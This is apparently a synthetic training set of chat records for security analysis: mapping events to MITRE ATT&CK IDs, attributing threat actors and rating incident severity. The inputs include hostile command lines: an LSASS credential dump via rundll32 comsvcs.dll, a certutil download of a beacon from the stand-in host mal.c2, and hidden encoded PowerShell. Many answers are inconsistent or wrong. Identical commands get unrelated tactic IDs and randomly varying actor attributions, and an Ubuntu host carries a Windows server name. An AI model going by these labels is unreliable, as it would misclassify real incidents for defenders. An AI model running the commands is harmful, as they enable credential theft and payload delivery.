messages
listlengths
2
2
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3775 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"Scattered Spider\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-CZL03NSODV)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Persistence, Execution", "role": "user" }, { "content": "...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.2/TCP connection to 1.160.132.209", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (AZURE-VM-FK01YGGYDW)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Collection, Execution", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-MH6JBVFM63)\nNetwork Activity: TLSv1.2/TCP to aws.amazon.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"severity\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-H4GG7QPELW)\nNetwork Activity: TLSv1.2/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Credential Access", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-HW2SX3O2UR)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\": \"High\"...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 2534 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, Fileless, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3337 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, WMI, Fileless", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confid...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 3242 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.111.215.238", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-17NTS1PON2)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Credential Access, Discovery, Reconnaissance", "role": "user" }, ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2507 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.95.154.112", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\", \"TA0008\", ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, Fileless, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-HUYK8V7J65)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access", "role": "user" }, { "content": "{\"severity...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: HTTP/TCP connection to 1.42.223.91", "role": "user" }, { "content": "{\"tactics\": [\"TA0001\", \"TA0011\"], \"t...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-V8UWJS8S5S)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Reconnaissance, Privilege Escalation, Lateral Movement", "role": "user" },...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems.", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T1563\", \"T1563.001\"]}", "role": ...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: Base64, TLS, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\", \"confide...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.114.194.174", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0010\"], \"techniques\": [\"T1531\"]}"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-KO8EJV326Y)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Command and Control", "role": "user" }, { "content": "{\"sever...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3543 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.175.185.14", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techn...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Monitor unexpected changes and/or interactions with termsrv.dll, which is typically stored in %SystemRoot%\\System32\\.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\"], \"techniques\": [\"T1505.005\", \"T1505\"...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-JCPNX2E8V3)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Discovery, Initial Access", "role": "user" }, { "content": "...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: rundll32.exe comsvcs.dll, MiniDump 3215 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.100.136.235", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, Base64, LOLBin", "role": "user" }, { "content": "{\"actor\": \"FIN7\", \"confidence\": \"Hig...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-9B6VB26ZKW)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Privilege Escalation, Defense Evasion, Lateral Movement", "ro...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: rundll32.exe comsvcs.dll, MiniDump 3622 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.8.124.54", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0008\", \"TA0009\"], \"te...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-OA9SIC30CM)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Execution, Initial Access, Defense Evasion", "role": "user" }, {...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Dtrack can collect network and active connection information.", "role": "user" }, { "content": "{\"tactics\": [\"TA0007\"], \"techniques\": [\"T1049\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-UH8C7X5WX2)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Impact, Lateral Movement", "role": "user" }, { "con...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.151.35.109", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techniques\": [\"T15...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 1943 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.3/TCP connection to 1.153.155.168", "role": "user" }, { "content": "{\"tactics\": [\"TA0009\...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.115.46.254", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniques\": [\"T10...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-2T9FKZHV1V)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance, Impact, Execution", "role": "user" }, { "...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (IAM-ROLE-W3R3XC9JLK)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Execution, Credential Access, Defense Evasion", "role": "user" }, { ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: This could enable someone to move from unprivileged or user level permissions to SYSTEM or root permissions depending on the component that is vulnerable.", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (AZURE-VM-KCAXX9BN5E)\nNetwork Activity: TLSv1.3/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Command and Control", "role": "user" }, { "cont...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Fileless, TLS, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": \"Hi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: JA3 Spoof, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", ...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: rundll32.exe comsvcs.dll, MiniDump 2603 C:\\temp\\lsass.dmp full\nNetwork: HTTP/TCP connection to 1.157.223.124", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\", \"TA0005\", \"...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.", "role": "user" }, { "content": "{\"tactics\": [\"TA0042\"], \...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: RemoteCMD can execute commands remotely by creating a new service on the remote system.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1569.002\", \"T1569\"]}", "rol...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: bitsadmin.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: HTTP/TCP connection to 1.55.103.3", "role": "user" }, { "content": "{\"tactics\": [\"TA0004\", \"TA0001\"], \"technique...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nEvasion Methods: Base64, JA3 Spoof, WMI", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon\...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: powershell.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: HTTP/TCP connection to 1.77.58.68", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\"], \"techniq...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.20.14.252", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0006\",...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Bankshot encodes commands from the control server using a range of characters and gzip.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1132\", \"T1132.002\"]}", "rol...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.2/TCP connection to 1.4.186.182", "role": "user" }, { "content": "{\"tactics\": [\"TA0010\"], \"technique...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.155.205.232", "role": "user" }, { "content": "{\"tactics\": [\"TA0043\", \"TA0003\"], \"tec...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: InvisiMole samples were timestomped by the authors by setting the PE timestamps to all zero values.", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1070\", \"T1070.006\"]...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (AZURE-VM-4NBR1G85ZO)\nNetwork Activity: TLSv1.2/TCP to update.microsoft.com\nAttack Tactics: Command and Control, Collection", "role": "user" }, { "content...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: SLOTHFULMEDIA has downloaded files onto a victim machine.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1105\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-1JFK2LWTGX)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Lateral Movement, Reconnaissance, Persistence", "role": "user" }, { ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-LKWGB7FLZ1)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access, Exfiltration, Collection", "role": "user" }, { "conte...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (WIN-FIN-SRV-MM7XUW8M52)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Impact, Exfiltration, Execution", "role": "user" }, { "content": "{\"sev...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: APT37 has used Python scripts to execute payloads.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.006\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, LOLBin, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"con...
[ { "content": "Identify the ATT&CK IDs present in the report below.\n\nInput: Ragnar Locker has used cmd.exe and batch scripts to execute commands.", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1059.003\", \"T1059\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Base64, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\", \"c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-8BH4J2RVGP)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Discovery, Privilege Escalation", "role": "user" }, { "conten...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: wmic.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.187.158.199", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\", \"TA0008\", ...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Boot or Logon Initialization Scripts, Unix Shell Configuration Modification...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (APP-WEB-5INOLSX7JZ)\nNetwork Activity: HTTP/TCP to update.microsoft.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nNetwork: TLSv1.3/TCP connection to 1.53.241.197", "role": "user" }, { "content": "{\"tactics\": [\"TA00...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (APP-WEB-0OG5BCCDTS)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Initial Access, Execution", "role": "user" }, { "content": "{\"severity\"...
[ { "content": "Extract the ATT&CK IDs from this log data.\n\nInput: Process: certutil.exe executing: rundll32.exe comsvcs.dll, MiniDump 796 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.7.76.38", "role": "user" }, { "content": "{\"tactics\": [\"TA0002\"], \"techniques\": [\"T1098.004...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: [random string].plist to establish persistence.", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1543.001\", \"T1543\"]}", "role": "assistant" } ]
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Regularly check component software on critical services that adversaries may target for persistence to verify the integrity of the systems and identify if unexpected changes have been made.", "role": "user" }, ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: mshta.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.3/TCP connection to 1.123.63.131", "role": "user" }, { "content": "{\"tactics\": [\"TA...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (EC2-INST-W1HX03XPAK)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Initial Access, Lateral Movement", "role": "user" }, { "content": "{...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 3999 C:\\temp\\lsass.dmp full\nEvasion Methods: TLS, LOLBin, WMI", "role": "user" }, { "content": "{\"actor\": \"APT29\", \"confidence\": ...
[ { "content": "Extract Tactic (TA) and Technique (T) IDs from this threat description.\n\nInput: Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls.", "role": "user" },...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (EC2-INST-51MUSQ9Q9A)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Defense Evasion, Execution, Lateral Movement", "role": "user" },...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-X3VGPJZP72)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Lateral Movement, Credential Access", "role": "user" }, { ...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: cmstp.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.2/TCP connection to 1.44.177.165", "role": "user" }, { "content": "{\"tactics\": [\"TA0...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (EC2-INST-0D1W9SIEGX)\nNetwork Activity: HTTP/TCP to aws.amazon.com\nAttack Tactics: Execution, Initial Access", "role": "user" }, { "content": "{\"severity...
[ { "content": "Map the following security event to MITRE ATT&CK tactics and techniques.\n\nInput: Process: certutil.exe executing: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nNetwork: TLSv1.3/TCP connection to 1.34.174.40", "role": "user" }, { "content": "{\"tactics\": [\"T...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (DB-ORACLE-2F8XDKQYL2)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Initial Access, Discovery", "role": "user" }, { "content": "{\...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: In our analysis, the macro is obfuscated, character by character, using the decimal ASCII code", "role": "user" }, { "content": "{\"tactics\": [\"TA0005\"], \"techniques\": [\"T1027\"]}", "role": "ass...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Amazon Linux 2 system (WIN-FIN-SRV-IPQPWKNRDD)\nNetwork Activity: TLSv1.2/TCP to github.com\nAttack Tactics: Privilege Escalation, Lateral Movement", "role": "user" }, { "con...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (WIN-FIN-SRV-SC4ZWT8PQC)\nNetwork Activity: TLSv1.3/TCP to update.microsoft.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severi...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nEvasion Methods: Base64, WMI, LOLBin", "role": "user" }, { "content": "{\"actor\": \"UNC4841\", \"confidence\": \"High\...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-0YSGYKDUTK)\nNetwork Activity: HTTP/TCP to cdn-content.com\nAttack Tactics: Reconnaissance, Initial Access, Exfiltration", "role": "user" }, { "c...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows 11 system (DB-ORACLE-SNWMJKE17J)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Impact", "role": "user" }, { "content": "{\"severity\": \"Extreme\", \"bus...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: BadPatch uses HTTP for C2.", "role": "user" }, { "content": "{\"tactics\": [\"TA0011\"], \"techniques\": [\"T1071\", \"T1071.001\"]}", "role": "assistant" } ]
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: bitsadmin.exe executing: powershell.exe -nop -w hidden -enc JABkACAALQBlAH...\nNetwork: TLSv1.3/TCP connection to 1.184.68.31", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0008\"], \"techni...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (APP-WEB-OE6SSHNZ3V)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Reconnaissance", "role": "user" }, { "content": "{\"severity\": \"High\", ...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Windows Server 2022 system (EC2-INST-NYIXDH7TTO)\nNetwork Activity: HTTP/TCP to github.com\nAttack Tactics: Discovery", "role": "user" }, { "content": "{\"severity\": \"Criti...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-QETZ4UX2IY)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Defense Evasion, Persistence", "role": "user" }, { "content": "{\"s...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: cmstp.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: HTTP/TCP connection to 1.9.33.36", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\", \"TA0001\"],...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...\nEvasion Methods: LOLBin, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 706 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, WMI, TLS", "role": "user" }, { "content": "{\"actor\": \"Mustang Panda\", \"conf...
[ { "content": "Classify this cyber threat intelligence into MITRE ATT&CK labels.\n\nInput: FIN6 has extracted password hashes from ntds.dit to crack offline.", "role": "user" }, { "content": "{\"tactics\": [\"TA0006\"], \"techniques\": [\"T1110\", \"T1110.002\"]}", "role": "assistant" } ]
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: rundll32.exe comsvcs.dll, MiniDump 688 C:\\temp\\lsass.dmp full\nEvasion Methods: JA3 Spoof, Fileless, Base64", "role": "user" }, { "content": "{\"actor\": \"APT41\", \"conf...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: rundll32.exe comsvcs.dll, MiniDump 2033 C:\\temp\\lsass.dmp full\nNetwork: TLSv1.2/TCP connection to 1.170.143.70", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\"], \"techni...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: WMI, Fileless, JA3 Spoof", "role": "user" }, { "content": "{\"actor\": \"Volt Typhoon...
[ { "content": "Instruction: Identify the threat actor based on the following attack characteristics.\n\nInput: Process Command: certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll\nEvasion Methods: Base64, JA3 Spoof, Fileless", "role": "user" }, { "content": "{\"actor\": \"Lapsus$\"...
[ { "content": "Identify the Tactic and Technique for this security event.\n\nInput: Process: rundll32.exe executing: powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...\nNetwork: TLSv1.2/TCP connection to 1.3.25.93", "role": "user" }, { "content": "{\"tactics\": [\"TA0008\", \"TA00...
[ { "content": "Instruction: Assess the severity and business risk of the following security incident.\n\nInput: Target System: Ubuntu 22.04 system (WIN-FIN-SRV-7NA58JTS8Y)\nNetwork Activity: TLSv1.3/TCP to github.com\nAttack Tactics: Privilege Escalation, Execution", "role": "user" }, { "content": "{...
[ { "content": "Map the following security text to MITRE ATT&CK tactics and techniques.\n\nInput: C:\\Windows\\System32\\utilman.exe", "role": "user" }, { "content": "{\"tactics\": [\"TA0003\", \"TA0004\"], \"techniques\": [\"T1546.008\", \"T1546\"]}", "role": "assistant" } ]